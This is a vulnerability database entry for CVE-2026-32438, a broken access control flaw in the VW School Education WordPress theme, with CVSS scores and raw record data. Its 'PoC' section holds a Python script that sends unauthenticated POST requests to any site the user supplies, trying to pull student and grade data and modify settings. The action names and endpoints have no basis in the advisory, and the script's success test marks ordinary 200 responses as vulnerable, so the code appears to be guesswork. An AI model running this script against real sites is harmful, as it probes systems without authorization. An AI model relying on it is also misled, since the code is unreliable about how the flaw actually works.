Security Vulnerability Report
中文
CVE-2026-32438 CVSS 5.3 MEDIUM

CVE-2026-32438

Published: 2026-03-13 19:55:04
Last Modified: 2026-04-29 10:17:10

Description

Missing Authorization vulnerability in vowelweb VW School Education vw-school-education allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW School Education: from n/a through <= 1.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

VW School Education Theme <= 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32438 PoC - VW School Education Broken Access Control # No authentication required import requests import sys target = input("Enter target URL: ").rstrip('/') # Common vulnerable endpoints in VW School Education theme vulnerable_paths = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', '/wp-content/themes/vw-school-education/' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing CVE-2026-32438 on {target}") print(f"[*] Target: VW School Education Theme <= 1.4.6") # Test unauthorized access to admin functions test_payloads = [ ('action=get_school_data', 'School data enumeration'), ('action=vw_get_students', 'Student data access'), ('action=vw_get_grades', 'Grade information leakage'), ('action=update_settings', 'Settings modification attempt') ] for path in vulnerable_paths: url = target + path for payload, description in test_payloads: try: resp = requests.post(url, data=payload, headers=headers, timeout=10) if resp.status_code == 200 and 'error' not in resp.text.lower(): print(f"[!] VULNERABLE: {description}") print(f"[!] URL: {url}") print(f"[!] Response snippet: {resp.text[:200]}") except Exception as e: print(f"[-] Error testing {url}: {e}") print("[*] Scan complete. If vulnerabilities found, update theme immediately.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32438", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:04.027", "lastModified": "2026-04-29T10:17:10.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vowelweb VW School Education vw-school-education allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW School Education: from n/a through <= 1.4.6."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en vowelweb VW School Education vw-school-education permite la explotación de niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta a VW School Education: desde n/a hasta &lt;= 1.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vw-school-education/vulnerability/wordpress-vw-school-education-theme-1-4-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}